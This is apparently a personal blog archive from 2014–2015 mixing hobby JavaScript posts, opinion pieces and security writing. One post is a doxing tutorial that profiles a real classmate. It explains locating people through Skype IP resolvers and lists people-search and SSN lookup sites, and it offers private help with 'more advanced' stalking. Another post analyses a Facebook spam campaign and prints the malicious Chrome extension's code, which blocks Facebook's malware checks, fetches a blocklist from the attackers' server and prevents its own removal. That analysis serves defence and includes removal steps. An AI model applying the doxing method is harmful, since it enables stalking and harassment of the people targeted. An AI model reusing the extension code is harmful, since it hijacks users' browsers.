Thursday, January 1, 2015

Happy New Year!!

I know it's been a long time since I have made a blogpost. Which is the very opposite of what I intended to do with this blog. When I first made this blog I had decided that this will be different from all other blogs I ever had in the past.

A blog where I'll document what's been happening in my life and what all I have been learning at that time.

Sadly like all the new year resolutions people make every year and fail to live by those for more than a few weeks... Even I got too busy/lazy with everything that was going on in the past few months.

But here's a new year resolution I make that I will try to keep. I will be regular with my blog from now on.

I'm gonna start android app development again, learning logics for competitive programming and learning Russia (speaking/reading/writing). So you all can expect tons of interesting posts in the near future. 

Lastly a very happy and prosperous 2⃣0⃣1⃣5⃣ ( cause writing 2015,2k15 like that is too mainstream )

Party hard. 
Peace.

Sunday, September 14, 2014

The Great Dictator(1940): The Greatest Speech Ever!

I was really bored after studying about infinite series and different types of tests, convergence. divergence bla bla bla......

So I decided to watch a movie. After going up and down my movies collection I found it- The Great Dictator (1940). It has to be one of the best movies I have ever seen.
Its been many years since I last watched it.

In the past few weeks all the news channels have been showing only about how people are dying everywhere throughout the world. People killing each other in Gaza, ISIS beheading innocent journalists, floods in J&K... agony, death, despair.. everywhere.

Its chaos and destruction wherever you look on the world map.
And this movie today almost 74 years later talked about things the whole world has chosen to forget.




Transcript of Charlie Chaplin's speech:
I’m sorry, but I don’t want to be an emperor. That’s not my business. I don’t want to rule or conquer anyone. I should like to help everyone - if possible - Jew, Gentile - black man - white. We all want to help one another. Human beings are like that. We want to live by each other’s happiness - not by each other’s misery. We don’t want to hate and despise one another. In this world there is room for everyone. And the good earth is rich and can provide for everyone. The way of life can be free and beautiful, but we have lost the way.
Greed has poisoned men’s souls, has barricaded the world with hate, has goose-stepped us into misery and bloodshed. We have developed speed, but we have shut ourselves in. Machinery that gives abundance has left us in want. Our knowledge has made us cynical. Our cleverness, hard and unkind. We think too much and feel too little. More than machinery we need humanity. More than cleverness we need kindness and gentleness. Without these qualities, life will be violent and all will be lost....
The aeroplane and the radio have brought us closer together. The very nature of these inventions cries out for the goodness in men - cries out for universal brotherhood - for the unity of us all. Even now my voice is reaching millions throughout the world - millions of despairing men, women, and little children - victims of a system that makes men torture and imprison innocent people.
To those who can hear me, I say - do not despair. The misery that is now upon us is but the passing of greed - the bitterness of men who fear the way of human progress. The hate of men will pass, and dictators die, and the power they took from the people will return to the people. And so long as men die, liberty will never perish...
Soldiers! don’t give yourselves to brutes - men who despise you - enslave you - who regiment your lives - tell you what to do - what to think and what to feel! Who drill you - diet you - treat you like cattle, use you as cannon fodder. Don’t give yourselves to these unnatural men - machine men with machine minds and machine hearts! You are not machines! You are not cattle! You are men! You have the love of humanity in your hearts! You don’t hate! Only the unloved hate - the unloved and the unnatural! Soldiers! Don’t fight for slavery! Fight for liberty!
In the 17th Chapter of St Luke it is written: “the Kingdom of God is within man” - not one man nor a group of men, but in all men! In you! You, the people have the power - the power to create machines. The power to create happiness! You, the people, have the power to make this life free and beautiful, to make this life a wonderful adventure. 
Then - in the name of democracy - let us use that power - let us all unite. Let us fight for a new world - a decent world that will give men a chance to work - that will give youth a future and old age a security. By the promise of these things, brutes have risen to power. But they lie! They do not fulfil that promise. They never will!
Dictators free themselves but they enslave the people! Now let us fight to fulfil that promise! Let us fight to free the world - to do away with national barriers - to do away with greed, with hate and intolerance. Let us fight for a world of reason, a world where science and progress will lead to all men’s happiness. Soldiers! in the name of democracy, let us all unite!
After this he says:
Hannah, can you hear me? Wherever you are, look up Hannah! The clouds are lifting! The sun is breaking through! We are coming out of the darkness into the light! We are coming into a new world; a kindlier world, where men will rise above their hate, their greed, and brutality. Look up, Hannah! The soul of man has been given wings and at last he is beginning to fly. He is flying into the rainbow! Into the light of hope, into the future! The glorious future, that belongs to you, to me and to all of us. 
Look up, Hannah. Look up!

This has to be the greatest message that Chaplin gave the world 74 years back... Its so sad that people no longer remember this..



"Liberty will never perish..."
I am waiting to see the clouds lift... and the Sun to break through... cause what I see now is sorrow and suffering.. and this isn't how the world should be like.. this isn't how people have to suffer..

Let us all hope.

The Streisand effect vs Right to be forgotten: ISIS Propaganda & TheFappening

First let us start off with defining all these big words in the title, and as every sane person we will take help of Wikipedia.

The Streisand Effect

The Streisand effect is the phenomenon whereby an attempt to hide, remove, or censor a piece of information has the unintended consequence of publicizing the information more widely, usually facilitated by the Internet.
It is named after American entertainer Barbra Streisand, whose 2003 attempt to suppress photographs of her residence in Malibu, California inadvertently generated further publicity of it.

Right to be Forgotten 

The right to be forgotten is a concept that has been discussed and put into practice in the European Union (EU) (most notably France) and Argentina in recent years.
In 2012, the European Commission published plans for a "right to be forgotten" law, allowing people to request that data about themselves to be deleted.


So, if you you have read this far I am sure you understand that on the internet these two things are like arch rivals.
The more you try to hide and suppress something on the internet, the more it will pop up everywhere and more people will get to know about it. "The Internet never forgets!"

Its easily evident from what happened after the European Commission, in 2012 published plans for a "right to be forgotten" law, allowing people to request that data about themselves to be deleted.
The judgement stresses that the rights of the individual are paramount when it comes to their control over their personal data. The ruling came after Mario Costeja Gonzalez complained that a search of his name in Google brought up newspaper articles from 16 years ago about a sale of property to recover money he owed.

And today everyone knows about Mario Costeja Gonzalez's "sale of property to recover money he owed" , how ironic.

ISIS

I had previously written and entire blog post on ISIS, but for all those people who have no clue-
The Islamic State of Iraq and Syria  is a Sunni jihadist group in the Middle East. In its self-proclaimed status as a caliphate, it claims religious authority over all Muslims across the world.
In short they are the most extreme terrorist group out there.
They have been recruiting people from UK, UK, Europe and even Asia.
They have been tweeting using different twitter #hashtags and also posting videos on YouTube to spread their propaganda so that more orthodox and extremists and people who are unaware of the truth get brainwashed and join them.

Recently they have beheaded two Americans journalists(James Foley on 19th August and Steven Sotloff on 2nd September) and just last night a Scottish aid worker (David Haines) who was working in Syria who was providing medicines to the people affected by the ongoing civil unrest.
All the videos of the beheading were uploading to YouTube in all cases and tweeted about on Twitter.

It sounds simple enough that YouTube should take down videos and Twitter should block hashtags and accounts instigated by the same groups. In both cases such speech is an incitement to violence, and hence illegal under British law. Having started as places for people to upload dating videos (YouTube) or let friends know what they are doing (Twitter), both networks have been thrown into the complex world of geopolitics, mixed with arguments over freedom of speech.

The fact that Isis fighters and would-be jihadists are digital natives who have grown up with cameraphones and internet access means that social networks are the first, rather than the last, place they look to spread their message.

Google and Twitter are happy to comply with the law (even share our private data with the government when required just as Snowden told us). Their problem, though, is that their systems are not set up to stop those videos, hashtags and accounts getting online – so taking them offline has become a game of "whack-a-mole", where no sooner have they been removed from one part of the site than they pop up at others. And the "Streisand effect" comes to play.

TheFappening

"The day the Internet Stood Still..... and fapped."
On 4chan an individual started posting private hacked pictures and videos of more than 20+ actresses including Jennifer Lawrence, Ariana Grande, Victoria Justice and many others. And soon people started tweeting pictures of these celebs on twitter, on reddit #TheFappening subreddit started and all the pictures and videos were being methodically compiled and soon all were getting uploaded to torrents. No matter where you go on the internet for example YouTube and searched for something like "best worldcup penalty shots"- the top comment would be "What are you doing here? #TheFappening is here."

And not even a day had passed lawsuits from the Hollywood lawyers started! celebrity.tumblr.com was taken down for hosting and publishing these pictures. The subreddit was banned. Google was asked to take down all photos from their search results... But we all know that that's impossible.
Twitter was banning people are random for tweeting to Jennifer Lawrence that her nude pics are amazing. And the drama continued with the people uploading all pictures and files to torrents and making new blogs and uploading them to different image sharing sites. Thousands of DMCA notices are still continuing. But we all know its no use.

Google and Twitter trying to get rid of ISIS Propaganda & TheFappening 

"The Internet Knows"
Long live... freedom of speech and Net Neutrality.

Tuesday, August 19, 2014

Stalk-a-thon: Stalking the Stalker!

Prologue
College, a place where numerous people from different backgrounds come to study, learn and enjoy their lives. Recently I heard about some weird people in college -who were stalking girls- like fools.
Let me just give a little details about what they did.
So this guy, started calling almost every girl who joined college this year, telling them about his sad life's story, waiting outside their classes, sms-ing them every night (I think he sent the same sms to everyone) , even running around with guitars, doing anything and everything to get their attention. Yes that's a lot of hard work. But, all for nothing. They all started ignoring him.

I feel such useless ways of getting attention is a waste of time. Cause in the end they will perceive you as a "weirdo" and stay a mile away from you.

But is stalking totally useless? Not quite.. I think if you are gonna go after someone: be it someone you love or someone you hate, maybe your mortal enemy or a princess right off a fairy tale, gathering intel about that person is essential, and increases the success rate of anything you might plan in the future.
So without wasting any more time.. Lets get on with some "stalking".

The Start
Here I am gonna gather as much intel as I can on one of the "stalkers" from college who I recently met.
Though I will redact most of the names and other things.
(I'm gonna refer to the person who I am gonna harvest info about as the "Subject")
By the way, always remember, never let the Subject know that he is being stalked! That's essential.

First up we need to find a place to start from- like email, Facebook id, phone number, or a photo, anything that can give you some initial info about that person.

So here I got his number: *****07183

Let's first find out who it belongs to. I'm simply gonna use Truecaller.
Most cases it would simply show you the name and if you are lucky you will find the Subject's picture as well.
<img>

But looks like I'm out of luck.. TrueCaller functions by drawing contacts from its users.. possibly this number is a new number or none of the girls he was stalking bothered to save his number or they didnt have Truecaller in their phone.
<img>

Then we go to our next source of unlimited information- Facebook.
Simply search the number on facebook search, if we are in luck, the person might have added his number to his to his profile and it might just show up. For example:


But seems we are not at all lucky when it comes to our subject..

Then last thing we can go with the number is just search in google- we can get infos about what websites he owns, or places he might have given his numbers to, tons of information.

And we are in luck..
Google has found us some info!


+91 *****07183 Mobile Number current Trace Details

Mobile number : +91 *****07183 
STD mobile number : 0*****07183 
Local mobile number : *****07183 
Telcom Circle : Kolkata Metro Telecom Circle 
Location : Kolkata city,Howrah city, Hooghly District or North & South 24 Parganas and Nadia Districts 
Country : India 
Major Cities of the Area : Kolkata 
Local language of Location: Bengali 
NetWork operator: Bharti Airtel 

But still these info are of no use. Just tells us the city he lives in and service provider.. But I can assure you sometimes Google finds amazing intel!
So last resort, let me ask any of the stalked girls the name of the stalker...

*After 2 mins*

Ok... so now we have a name!

Let's just simple find him on Facebook. (Since he is stalking people I know, he must have been sending tons of friend requests to classmates of those girls, so should be easy to find him on facebook.)

   "id": "10000*********6",
   "first_name": "Ad******",
   "gender": "male",
   "last_name": "K******",
   "link": "https://www.facebook.com/ad****************56",
   "locale": "en_US",
   "name": "Ad*************p",
   "username": "ad**************6"
Great.. thats the basic info from facebook graph.. lets take a better look at his profile.



Seems most all his posts and other details can be freely seen by anyone. (Not a good idea, I always suggest keeping all your Facebook details friends only or friends-of-friends at max.)















Hmmm... so lots of info.. where he is originally from.. where all he studied and the name "Bansal" should give a fair idea about his what his family expected from him.

Pretty normal stuff..
Okay, now time for checking out the old posts, these tend to give you lots of good info..
Like for example if the person posts a lot of pictures, or writes tons of crappy statuses or posts links to songs.. sports or political issues.. 


But in this case.. we notice that the Subject just joined facebook last year, and he only started making status updates once he joined college.. I'm guessing he really had a lot of high hopes for college. Which were inspired by bollywood movies of course..

Anyways he is not really worth stalking (aka "doxing" as its popularly called on the internet) anymore..
But if it was necessary we could always take a look at his brother.

Since his brother came to earth before him.. he will have more information to offer.

So I am guessing its not his real brother.. maybe cousin or something.. they both are from the same state.. and studied in the same school etc.. Anyways, nothing interesting about these people. Totally disappointing.. :\

So as we can see, we were able to gather a lot of info from simple sources that are at everyone's disposal..
But I haven't got the opportunity to discuss any interesting methods of finding information about people..
So for that lets take another Subject.



We gonna use social-engineering, what it basically means is to talk, interact with people or the Subject and gather information about them or make them do something that will make your life work easier.

Skype Resolver



So what can we do with the skype id?
We can find the Subject's ip address and consequently his location!

Because skype is a peer-to-peer Instant Messanger and because a few people were able to successfully reverse engineer skype- we can trace ips of skype users.
So they were able to make tools that can send requests to connect to the Subject's skype id and the server returns the ip of the Subject in response as per the history log saved in the skype main servers.

This is called skype ip resolving.. there are both offline and online tools for this.. you can even search on the internet "Skype IP resolver" and find your friend's ip address.

Protect you IP from getting Resolved

Since I am writing about skype IP resolvers I will also mention how to protect your ip from these.

You can of course go to settings and change how skype connects to the internet and put a socks5 or socks4 or a proxy server ip in it.. and every time someone tries to grab your IP they will fail.

But not everyone has access to high speed good quality socks/proxies.
Hence the following method will be far easier and better.


  1. Make an email @ live.com. [MAKE SURE its NOT hotmail but live.com email!]. The name you choose for the bit before @live.com will be your skype name that you can share with your friends. For example, 418sec@live.com , then my skype id will be live:418sec 
  2. Go onto Skype and select "sign in with Microsoft Account" or something like that!
  3. go through normal Sign up process and when you are done your skype shouldn't be resolvable!

Other ways of harvesting data about your Subject

If your Subject lives in USA... ohhh boy.. You can get his entire identity in matter of 5 mins. 

(If you don't live in USA or the person who you are gonna stalk doesn't really have much presence on the internet, probably because he is a low-life stalker who just wanted his movie fantasies to cone true in college just skip to the Conclusion at the bottom of this post)

Recently a large database was stolen from a US gov agency. It contains names, address, date of birth(DOB) and the social security numbers(SSN) of almost everyone.So if you are in USA.. you are just unlucky.

For people living in Europe & Australia, of course almost everyone has access to the internet, because of which if you are not careful you can leave your data wide open and can be found by people who might wish you harm using  that info.

Since the stalker who I was doxing lives in India of course he doesn't have much data on the internet. But for people living in other parts of the world- you can find data about them by searching in sites like linkedIn, Facebook. Once you know their email id you can do reverse-whois search and find what websites they own, you can search on http://com.lullar.com, its a very useful site and pulls up any information it can find.
If you know what username the Subject uses in most of his social networking sites try http://knowem.com/

You can even find IP addresses using emails. It requires the person to reply to your email or send you and email somehow. As I said before social engineering plays a vital part and makes life a lot easier if you can just make the person do what you want to help you on your current mission. 

Once you get more info like name, city etc you can also look it up on http://whitepages.com. This will give you lots of info like address telephone number etc. (Might return multiple results, just need to use your head and find the who you are looking for).

If you have the person's picture you can try http://tinyeye.com or https://www.google.com/imghp, upload the image and click search. Reverse image search usually returns great results. So for all those parties where you took drunk selfies with girls and don't remember their name, exceptionally useful method!

I am gonna do a compilation of a whole lot of other sites you can look up people's infos from.
Again if your Subject lives in a third world country and doesn't have much internet presence, these wont be useful,

Compilation of Sites
-General 
*These should be your first stop.* 
http://www.zabasearch.com/- No Success with Whitepages? Try this. http://www.zoominfo.com/-professional career and employment. http://wink.com/- Another people search
http://www.freeality.com -name, city, and state. http://www.infospace.com/-companies by name, category, or city. http://www.isearch.com - Phone Books
http://www.whitepages.com/find_neighbors- Need to confirm dox?calling neighbors and asking for the target. They tell you how you can reach them.
http://www.411.com/-source for free people and business searches in the US and Canada.
http://www.google.com/search?hl=en&pb=r&q=NAME+HERE+%28first+or+last+or+b oth%29+optional%3A+state%2Fzipcode%2Fcity%2Fetc. just click it.
http://infobel.com-links to almost every phonebook in the world. - Social Networks Facebook,MySpace,YouTube,Blogs, Whois ect. http://www.pipl.com/- Searches quite a few different places
http://com.lullar.com/- A profile searcher for Networking sites.
http://www.checkusernames.com/ - Check to see if a username has been used on over 9000 websites.
http://www.ip2location.com/-accurate!
http://www.paterva.com/web5/- It provides excellent results when e-mail addresses and full names are used.
http://www.archive.org/index.php- Find deleted webpages.
http://www.emailchange.com/-have somebody's old email, find current ones.
http://www.nedsite.nl/search/people.htm#top- Search email by name, phone, fax, college, ancestors, etc.
http://www.selfseo.com/find_ip_address_of_a_website.php - Find the ip of a protected site
- The TV Tropes method
http://tvtropes.org/pmwiki/el.php?findfor=InsertNameHere - If you have a username and think they may use this site, you can get their IP address. Just find one of their edits and highlight next to their name. Works best for deviantARTists, fanfiction writers, and other fantards that think they're pop-culture analysts.
- Images
http://tineye.com/- You can use this handy tool to see what sites have pictures of the target.
http://regex.info/exif.cgi -EXIF searcher.
- Government Databases
http://www.192.com/ - Look up UK docs
http://www.criminalsearches.com/- Even minor traffic offenses can be found.
http://www.blackbookonline.info/- Free Public Records Search Engine. http://www.dmv.org/-links to state DMV's. http://skipease.com/-Everything from SSN searches to Death Indexes. http://www.whoishe.com/- Background check
- Maps
Google Maps, Google Earth , Mapquest
-Miscellaneous Tools 
http://krilome.com/aprod/index-cse.html- Hide shit

Conclusion
Stalking people on the internet isn't illegal. Even our governments do it (In a more advanced way as Snowden showed us).
Since all these information are publicly available if you read them its not a crime. But then it depends how you use them. (If you get in trouble, I ain't responsible ! :P )

PS. There are more advanced ways of stalking people.. Which kinda questions legality hence I haven't mentioned them here. In case you are interested, and you know how to contact me, I'll help you out. ;)

Monday, August 4, 2014

Playing with the Doodle Balls

So back in 2010 (September 7),  Google made this amazing doodle..
Now, the reason I loved this one especially is because they made something so awesome with only javascript!
No flash, no actionscript, nothing fancy.. So it does not have any kind of dependency on activex, adobe flash or silverlight for that matter.. Its an html page that will run on even crappy Internet Explorer! :D

And that day i clearly remember spending half an hour just rolling my mouse over this..

Anyways at that time I wanted to recreate it... to say something that I want..
But because I didnt know much about coding or anything at that time.. after doing a big of google search I sorta just forgot all about it.

But I have always respected and been inspired by the the standards of innovation and commitment the guys at Google/Apple show in whatever work they do.. [Unlike Microsoft and Oracle for that matter.. (Java is a mess!)]

Anyways recently I found this doodle again just by accident..
And I started working on it.. trying to understand how they coded it and then attempting to recreate it..


                                     The Google doodle from Sept 7, 2010

(Since I cannot properly put the javascript codes here.. I had to host it elsewhere and iframe it on this post..
For a better doodle playing experience check out the links I have given below!)
Link to the Google's doodle:
http://ebullient.vacau.com/google.html
                                                            418Sec all the way!!

Link to the my doodle:
http://ebullient.vacau.com/418Sec.html
(I know its not as good as Google's , but then again... I am me.. and Google is too good.. :P )

If anyone wishes to take a look at the source code of the doodle I made, its available for download there on my blogfiles folder:
https://spideroak.com/browse/share/FFA/418sec/

Yes, its just the 418sec.html file.. few lines of html and css and a whole lot of jquery/javascript..
Hint: " The magic happens in the D( ) function. "

I am sure everyone will enjoy playing with this as much as I did.. :D


Countdown in Javascript/ jQuery: Tick Tock

So recently I had to make a simple countdown program for the Intra-Mun that was happening in my school..
So even after joining college I went back to school cause I really missed it as well..

Anyways let me first give some details about the functions:

  • Set hour/min/sec
  • Start/Pause/Reset(to the last entered time)
  • I added two buttons for presets of 30 secs and 1 min.
  • remove the input menu with keyboard shortcuts
  • And I made keyboard shortcuts for all functions cause I knew i would feel too lazy to click..
  • Coded in Javascript/jQuery with some css 
  • And after time reaches 0.. there I added a nice pop-up notification!
Here is how the entire page looks like when timer is running:

And then there are lots of keyboard shortcuts.. honestly I added them because I was feeling bored and I wanted to see what else I can do to make it more interesting..
In case the user forgets.. one can always press the "h" or "H" key on the keyboard..
Matthew 7:7 "Ask and it will be given to you.."
Same right here..
A lovely pop-up telling you which key does what
And then there is the input menu of course which arrives when you start or press "M"/"m" to bring it.. or "x"/"X" to get rid of it and clear the screen..

Of course all these are pretty simple.. But I thought since I spent my time on this.. hopefully someone might be able to use this as well in the future.. 


(Yes, I am paranoid with privacy and security.. So screw googledrive and dropbox.. I am trying out SpiderOak.. I am not gonna let NSA have my files no matter how insignificant they are..)

PS.
This is the notification when your time runs out.. ;)

Sunday, July 27, 2014

This video is yours? : The On-going Facebook Spam Campaign

In the past I have seen several facebook spam campaigns...
The usual ones are the ones that offer to change your facebook theme or hack your friend's account... in both cases you either paste your oauth code which u get from facebook after you accept to share your information to the app they specify, etc.

But this new campaign is better..
Its was live for the last 5 days and you can see the number of people infected by it and online from their amung.us url.
[Which I found after analyzing their plugin as we will see later in this post]

http://whos.amung.us/stats/userlistx5/

 So lets get into more details of how this spam campaign spread.

Prerequisites:
Nice landing pages, domains, silent plugin installers, plugins with some sweet javascript codes, and some more nice javascript code on their sites.

Step 1.
They bought installs to their plugin installers.
Step 2.
The plugins contacted their sites and then checked if user was logged into facebook.
Step 3.
The javascript spammed the user's friends with message like:

The RED part is you friend's name; The Grey part is your friend's photo.

A fairly convincing photo.. On which people instantly clicked..
It redirected them to the landing pages which looks like:


Again fairly convincing for normal everyday facebook users..
Step 4.
Then they saw the red arrow and clicked on the exe and ran it..

Now the important clue we get from this landing page is "Ana Sayfa"
Which is Turkish for "Home Page"
I am guessing the guys who made this page copied the Facebook bar codes straight out of facebook.
Hence they might be from Turkey.


So lets try to get more details about the plugin installer and the plugin.

Analysis of the exe by Virustotal:
Earlier [2 days ago] detections were: 7/53
Currently its: 22/53
[https://www.virustotal.com/en/file/db44cfb583e2b409d262e6d539106e4af8f33117a613983381b60cc0ee00e30d/analysis/1406476387/ ]


Now the exe installs a plugin..
Its name and other components are downloaded from the website the coder setup.
Hence the plugin after certain time intervals has a new name and new manifest file generated on the site.
In order to stop chrome from mass deleting a certain plugin.
The manifest.json file for the plugin:
The Preferences file for the plugin:


The background.js file thats injected by the plugin:


Now this background.js has two important functions..

1. It calls the javascript code from ext/s.php that does the spamming of the friends:
from here we can clearly see the whos.amung.us that is being used to keep track of the campaing.

2. The background.js has some interesting code in the end..
chrome.webRequest.onBeforeRequest.addListener(
  function (details) {
    var url = details.url;
    for (var i = 0; i < deep.length; i++) {
      if (url.indexOf(deep[i]) > -1) {
        return {
          cancel: true
        };
      }
    }
  }, {
    urls: ["<all_urls>"]
  }, ["blocking"]
);
var deep = ["facebook.com/csp.php","facebook.com/checkpoint/malware/cr_ext_config"];
function trance() {
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4) {
try {
JSON.parse(xmlhttp.responseText).forEach(function (d) {
if (d.uri) {
deep.push(d.uri);
}
});
} catch (e) {}
}
};
xmlhttp.open("GET", "http://patronbayi.com/ext/get.js", true);
xmlhttp.send();
}
trance();


chrome.tabs.onUpdated.addListener(function(tabid,x,tab)
{if(tab.url=="chrome://chrome/extensions" || 
tab.url=="opera://extensions" || 
tab.url=="chrome://help/" || 
tab.url=="chrome://extensions/")
{ 
chrome.tabs.remove(tab.id); 
} 
});
Now what this firstly does is.. it gets a list of domains from ext/get.js..
These are the domain names of Antivirus companies, etc who might detect this plugin and alert the user..

And the last part is the chrome.tabs.onUpdated.addListener() function that stops the user from opening the
chrome://extensions tab.. so even if the user tried to delete the plugin he could not.. At least not from the browser..
So, for everyone who wants to know how to remove it..
You would have to manually go to %localappdata% then Google\Chrome\User Data\Default\Extensions and then delete the rogue plugin, or just delete all the plugins and then install the plugins you need from chrome store again..
Here is an image to help explain better..




And now...
A Blast from the Past..

Facebook Black Theme people are also back!
[I have a hunch that these guys might know each other as i have seen both of them use similar codes or they might have stolen codes from each other or something..]

Originally it was being spread from:
https://www.facebook.com/notes/facetoon/switch-to-black-facebook-click-on-below-image/1503844979832724

So its something i noticed when i found this..
On facebook pages you can create notes.. and insert images which are hyperlinked to sites!

So as soon as the users clicked on the images it redirected them to those old get facebook theme landing pages that has steps like allow this app.. copy paste your oauth code like and idiot..

Then it would find people from the user's friend list and go spam their wall with the message
"Hey <friend's name>, I am using this new facebook theme. Try it out now! go here: <link to the facebook page note> "

But as since the link being spammed was a facebook domain itself.. it took facebook almost a 24 hours before they began deleting those messages and finally closed the page itself.


Seems like these people are discovering interesting things..
And every time Facebook thinks they have seen enough of the spammers and have found all the ways to stop them using their spam detection bots..
These guys come back with new surprises and more firepower!